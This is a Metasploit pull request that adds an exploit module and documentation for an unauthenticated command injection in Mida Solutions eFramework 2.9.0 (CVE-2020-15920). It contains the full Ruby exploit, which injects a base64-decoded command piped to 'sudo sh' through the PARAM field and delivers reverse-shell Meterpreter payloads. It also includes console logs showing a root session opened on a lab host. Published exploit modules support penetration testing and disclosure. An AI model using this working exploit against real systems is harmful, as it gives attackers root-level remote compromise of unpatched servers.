### PR TITLE
Add Mida Solutions eFramework ajaxreq.php Command Injection

### DIFF
--- a/documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
+++ b/documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
@@ -1,7 +1,8 @@
 ## Vulnerable Application
 
-This module exploits a command injection vulnerability in Mida
-Solutions eFramework version 2.9.0 and prior.
+This module exploits a command injection vulnerability in
+[Mida Solutions eFramework](https://www.midasolutions.com/)
+version 2.9.0 and prior.
 
 The `ajaxreq.php` file allows unauthenticated users to inject
 arbitrary commands in the `PARAM` parameter to be executed as the
@@ -11,6 +12,10 @@ command execution as root.
 
 This module has been successfully tested on Mida Solutions
 eFramework-C7-2.9.0 virtual appliance.
+
+Download:
+
+http://ova-efw.midasolutions.com/
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
+++ b/documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
@@ -5,10 +5,10 @@ This module exploits a command injection vulnerability in
 version 2.9.0 and prior.
 
 The `ajaxreq.php` file allows unauthenticated users to inject
-arbitrary commands in the `PARAM` parameter to be executed as the
-apache user. This user is permitted to execute any command as root
-using sudo without providing a password, resulting in privileged
-command execution as root.
+arbitrary commands in the `PARAM` parameter to be executed as
+the apache user. The sudo configuration permits the apache user
+to execute any command as root without providing a password,
+resulting in privileged command execution as root.
 
 This module has been successfully tested on Mida Solutions
 eFramework-C7-2.9.0 virtual appliance.
@@ -40,14 +40,14 @@ msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce
 msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123
 rhosts => 172.16.191.123
 msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check
-[+] 172.16.191.123:443 - The target is vulnerable. uid=0(root) gid=0(root) groups=0(root)<br>
+[+] 172.16.191.123:443 - The target is vulnerable.
 msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165
 lhost => 172.16.191.165
 msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run
 
 [*] Started reverse TCP handler on 172.16.191.165:4444 
 [*] Executing automatic check (disable AutoCheck to override)
-[+] The target is vulnerable. uid=0(root) gid=0(root) groups=0(root)<br>
+[+] The target is vulnerable.
 [*] Sending stage (3008420 bytes) to 172.16.191.123
 [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400
 [*] Command Stager progress - 100.00% done (897/897 bytes)

--- a/documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
+++ b/documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
@@ -1,0 +1,59 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in Mida
+Solutions eFramework version 2.9.0 and prior.
+
+The `ajaxreq.php` file allows unauthenticated users to inject
+arbitrary commands in the `PARAM` parameter to be executed as the
+apache user. This user is permitted to execute any command as root
+using sudo without providing a password, resulting in privileged
+command execution as root.
+
+This module has been successfully tested on Mida Solutions
+eFramework-C7-2.9.0 virtual appliance.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce`
+1. Do: `set RHOSTS [IP]`
+1. Do: `set payload [payload]`
+1. Do: `set LHOST [IP]`
+1. Do: `exploit`
+
+## Options
+
+### TARGETURI
+
+Base path to eFramework (Default: `/`)
+
+## Scenarios
+
+```
+msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce 
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123
+rhosts => 172.16.191.123
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check
+[+] 172.16.191.123:443 - The target is vulnerable. uid=0(root) gid=0(root) groups=0(root)<br>
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run
+
+[*] Started reverse TCP handler on 172.16.191.165:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. uid=0(root) gid=0(root) groups=0(root)<br>
+[*] Sending stage (3008420 bytes) to 172.16.191.123
+[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+
+meterpreter > getuid
+Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.16.191.123
+OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
+++ b/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Mida
+          Solutions eFramework version 2.9.0 and prior.
+
+          The `ajaxreq.php` file allows unauthenticated users to inject
+          arbitrary commands in the `PARAM` parameter to be executed as the
+          apache user. This user is permitted to execute any command as root
+          using sudo without providing a password, resulting in privileged
+          command execution as root.
+
+          This module has been successfully tested on Mida Solutions
+          eFramework-C7-2.9.0 virtual appliance.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'elbae', # discovery and exploit
+            'bcoles', # Metasploit
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-15920'],
+            ['EDB', '48768'],
+            ['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],
+          ],
+        'Payload' => { 'BadChars' => "\x00" },
+        'Targets' =>
+          [
+            [
+              'Linux (x86)', {
+                'Arch' => ARCH_X86,
+                'Platform' => 'linux',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Linux (x64)', {
+                'Arch' => ARCH_X64,
+                'Platform' => 'linux',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'UNIX (cmd)', {
+                'Arch' => ARCH_CMD,
+                'Platform' => 'unix',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'cmd/unix/reverse_bash'
+                }
+              }
+            ]
+          ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-08-27',
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 1,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to eFramework', '/'])
+    ])
+  end
+
+  def check
+    res = execute_command('id')
+
+    unless res
+      return CheckCode::Safe('Connection failed')
+    end
+
+    unless res.body.include?('uid=')
+      return CheckCode::Safe('Target is not vulnerable')
+    end
+
+    CheckCode::Vulnerable(res.body)
+  end
+
+  def execute_command(cmd, _opts = {})
+    vars_post = {
+      'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample,
+      'PARAM' => ";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh"
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'),
+      'vars_post' => vars_post
+    }, 5)
+
+    if res && !res.body.blank?
+      vprint_status("Command output: #{res.body.gsub(/<br>\z/, '')}")
+    end
+
+    res
+  end
+
+  def exploit
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(linemax: 1_500, background: true)
+    end
+  end
+end

--- a/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
+++ b/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
@@ -20,10 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
           Solutions eFramework version 2.9.0 and prior.
 
           The `ajaxreq.php` file allows unauthenticated users to inject
-          arbitrary commands in the `PARAM` parameter to be executed as the
-          apache user. This user is permitted to execute any command as root
-          using sudo without providing a password, resulting in privileged
-          command execution as root.
+          arbitrary commands in the `PARAM` parameter to be executed as
+          the apache user. The sudo configuration permits the apache user
+          to execute any command as root without providing a password,
+          resulting in privileged command execution as root.
 
           This module has been successfully tested on Mida Solutions
           eFramework-C7-2.9.0 virtual appliance.
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ]
           ],
         'Privileged' => true,
-        'DisclosureDate' => '2020-08-27',
+        'DisclosureDate' => '2020-07-24',
         'DefaultOptions' => {
           'RPORT' => 443,
           'SSL' => true
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe('Target is not vulnerable')
     end
 
-    CheckCode::Vulnerable(res.body)
+    CheckCode::Vulnerable
   end
 
   def execute_command(cmd, _opts = {})
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }, 5)
 
     if res && !res.body.blank?
-      vprint_status("Command output: #{res.body.gsub(/<br>\z/, '')}")
+      vprint_status("Command output: #{res.body.gsub(/<br>/, "\n")}")
     end
 
     res


### PR DESCRIPTION
## Vulnerable Application

This module exploits a command injection vulnerability in
[Mida Solutions eFramework](https://www.midasolutions.com/)
version 2.9.0 and prior.

The `ajaxreq.php` file allows unauthenticated users to inject
arbitrary commands in the `PARAM` parameter to be executed as
the apache user. The sudo configuration permits the apache user
to execute any command as root without providing a password,
resulting in privileged command execution as root.

This module has been successfully tested on Mida Solutions
eFramework-C7-2.9.0 virtual appliance.

Download:

http://ova-efw.midasolutions.com/

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce`
1. Do: `set RHOSTS [IP]`
1. Do: `set payload [payload]`
1. Do: `set LHOST [IP]`
1. Do: `exploit`

## Options

### TARGETURI

Base path to eFramework (Default: `/`)

## Scenarios

```
msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123
rhosts => 172.16.191.123
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check
[+] 172.16.191.123:443 - The target is vulnerable.
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (3008420 bytes) to 172.16.191.123
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400
[*] Command Stager progress - 100.00% done (897/897 bytes)

meterpreter > getuid
Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.16.191.123
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
